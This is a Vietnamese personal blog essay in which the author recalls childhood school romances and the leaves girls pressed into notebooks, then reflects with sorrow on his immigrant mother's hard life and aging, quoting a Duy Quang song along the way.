Cũng xin mượn bài hát để làm tiêu đề, và cũng làm kết thúc cho bài viết về Duy Khánh của tôi – như một nén nhang tri ân dâng lên người nghệ sĩ, đã sống, đã hát, và đã sống… với tình cảm dạt dào giành cho quê hương, cho đất nước.

Cám ơn, và vĩnh biệt ông.

-B.l.u.e.

em xưa còn thắt bím, nuôi dưỡng thêm ngây thơ

Đa phần khi vừa add nick gái nào, xinh, độc thân trên Facebook xong, anh đều nghĩ rằng mình cần viết bài gì đó, không là những áng văn trác tuyệt thì ít ra cũng phải đôi dòng thơ lãng mạn. Nhưng, xui thay, những lúc ấy, anh ngồi bóp trán cả buổi vẫn không nghĩ ra câu nào khác ngoài những câu cũ rích đại loại như: em, anh thấy khuôn mặt em đẹp, nhưng ngực em còn đẹp hơn, nên chỉ đành thở dài tiếc nuối.

Lại có những khi, chỉ vì vài hình ảnh vu vơ nào đó, lại có hứng viết ra những suy nghĩ miên man trong đầu. Ừ, đôi khi, để tích tụ thứ gì lâu quá cũng không tốt.

Hôm nay, anh lái xe về nhà trên một tuyến đường hoàn toàn khác so với tuyến đường đã đi gần một năm nay. Thật ra việc này đến từ lí do hết sức nhảm nhí: lách qua phải để vượt cái xe đi chậm, rồi khi xin change lane lại qua trái bọn nó không cho, ấy rồi phải chạy thẳng. Có một khúc khi dừng đèn đỏ, anh nhìn ra cửa sổ thấy bên tay trái mình là một hàng cây thấp, và xanh, xanh lắm.

Anh vốn dốt tất cả những gì liên quan đến thực vật học, nên chịu không biết tên nó là gì, nhưng loại cây đó có lá rất giống với lá học bài.
Anh vốn dốt tất cả những gì liên quan đến thực vật học, nên chịu không biết lá học bài tên thật là gì, nhưng đột nhiên anh thấy nhớ nhớ.

Anh nhớ hồi nhỏ thật nhỏ, khi đi học, anh hay chế giễu bọn con gái cứ tới mùa thi lại lấy lá học bài ép vào tập vở, với niềm tin và mong ước mãnh liệt là nó sẽ giúp tăng cái khả năng ghi nhớ của gái. Nhưng khi chúng nó đi khuất, anh lại nhanh tay vặt vài cái, rồi len lén nhét vào cặp.

Một vài năm tháng của tuổi thơ, cái niềm tin ngây ngô ấy đi cùng anh suốt những kì thi; và lạ thay, nó chỉ một cách hết sức thình lình biến mất. Có lẽ nó biến mất vì con người ta phải lớn lên, chứ không vì chúng ta nhận ra điều đó không có thật.

Anh thình lình hạ cửa sổ xuống, bất chấp cái lạnh của trời đông, đưa tay ra ngoài cửa xe, giả vờ nhấp nhấp tay theo nhịp nhạc, rồi, vẫn lén lút như ngày nào, quơ lấy vài chiếc lá, mỉm cười với chính bản thân mình rằng: giờ đây toàn bộ giáo trình nằm trong máy tính, lẽ đâu lại ép vào giữa máy tính chăng?

Anh bồi hồi, không phải vì đoạn kí ức đó, mà là cách bản thân anh nhìn đoạn kí ức đó, như những gì xa xôi không còn có thể chạm tới được…

Tiếng còi của cái xe đậu đằng sau khi đèn xanh mà anh chưa chạy lôi tuột anh về cái hiện tại hổ nhốn, tất bật và đầy bụi bặm, của những lo toan, từ việc học, việc làm, cho tới điều nhỏ nhặt kiểu chạy từ từ, cẩn thận, kẻo đụng vào xe người khác thì đền méo mặt. Anh thở dài vì cái hiện tại này không lâu thì lại chìm vào hồi tưởng khi iPod vang lên giọng Duy Quang

Em xưa còn thắt bím
nuôi dưỡng thêm ngây thơ
Anh xưa còn luýnh quýnh
giữa sân trường trao thư

Anh ước tìm lại được anh của ngày nào, khi trong thư viện viết một mảnh giấy làm quen, lén ném cho cô bé ấy, hồi hộp chờ và thất vọng khi không nhận được hồi âm, để rồi khi về nhà tự chửi mình ngu cả buổi vì mảnh giấy không có thông tin liên lạc gì, thì làm sao cô bé đáp trả.

Anh cũng ước thấy được hình ảnh cô bé cột tóc đuôi gà ngày xưa, mắt đỏ hoe khi nói với anh: quà 8/3 em mua tặng mẹ em, bị bọn anh vô tình quăng vỡ rồi, khi đám bọn anh “đặt nhẹ” cặp của bọn cô ra ngoài, chiếm lấy căn phòng làm chỗ ngủ trưa tại trường; để rồi vài ngày sau, hai má ửng hồng khi anh tặng cành hoa hồng như một món quà làm lành.

Giờ đây, đã không còn anh của lãng mạng trẻ con, lúng túng, ngại ngùng ấy nữa…

Em anh fone nhờ tra giùm nó đường đi tới quán sinh tố, anh định nhân tiện hỏi xem dạo này mẹ thế nào, mà thấy nó vội quá lại thôi. Nhớ tầm 2 tuần trước khi về nhà ăn Thanksgiving, đang đêm anh có việc cần nghe điện thoại, sợ cả nhà thức giấc mới chui ra garage đứng nói chuyện. Trời lúc đó lạnh lắm, trong garage không có hệ thống sưởi, anh mới chui vào trong xe mà ngồi. Giữa cuộc điện thoại ấy, đột nhiên anh nhận ra, anh đang ngồi trong cái xe mà sáng nào mẹ anh cũng lái đi làm. Tay anh đang đặt lên cái vô lăng mà bàn tay gầy gò của mẹ ngày nào cũng nắm lấy. Anh giơ chân mình ướm thử khoảng cách tới thắng và ga, để gắng hình dung hình ảnh mẹ anh lái xe.

Trời, anh thấy thật lạ lẫm, vì ngạc nhiên thay, anh chưa từng thấy mẹ lái xe lần nào.

Anh lớn lên luôn quen với hình ảnh hằng ngày thấy mẹ bán hàng, thấy mẹ nấu cơm, thấy mẹ đi chợ về, thấy mẹ cười vui, thấy mẹ buồn bã… Anh cho dù hiện tại sống xa nhà, vẫn cảm thấy như mẹ anh vẫn là hình ảnh trong trí nhớ bấy lâu, cho đến khoảng khắc đó.

Anh nhìn sang cái hộc trên xe, thấy tấm thẻ nhân viên của mẹ. Anh nhận ra rằng, có quá nhiều hình ảnh của mẹ mà anh đã và đang không được chứng kiến. Anh đột nhiên có cái cảm giác rằng, bằng cách này hay nọ, rồi sẽ có một ngày anh phải hối tiếc vì đã bỏ lỡ những hình ảnh như thế.

Càng ngày khi càng lớn lên, cái suy nghĩ mình cần chở che, bao bọc cho mẹ trong anh ngày càng lớn. Anh thấy buồn khi nghĩ đến bóng mẹ phải lái xe đi làm, anh lo lắng không biết mẹ chạy xe có vững không. Một lần nữa, anh sờ qua vô lăng, hộp số… và lại thấy buồn, buồn với hình ảnh mẹ gầy gò phải xoay trở với cuộc sống vất vả bên này, buồn khi nghĩ đến cảnh mẹ tiếng Anh nói không rành, lạc lõng giữa một đất nước nói một ngôn ngữ xa lạ.

Anh nhớ có lần, mẹ giơ bàn tay lên và nói đùa với anh: mẹ làm công việc sửa máy tính, ngày nào cũng phải vặn ốc, giờ tay chai hết rồi. Từ ngày đó, anh không còn thấy tự hào về bàn tay thon và đẹp của anh nữa.

Thật buồn khi thấy mình lớn lên, và thấy mẹ già đi…

.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.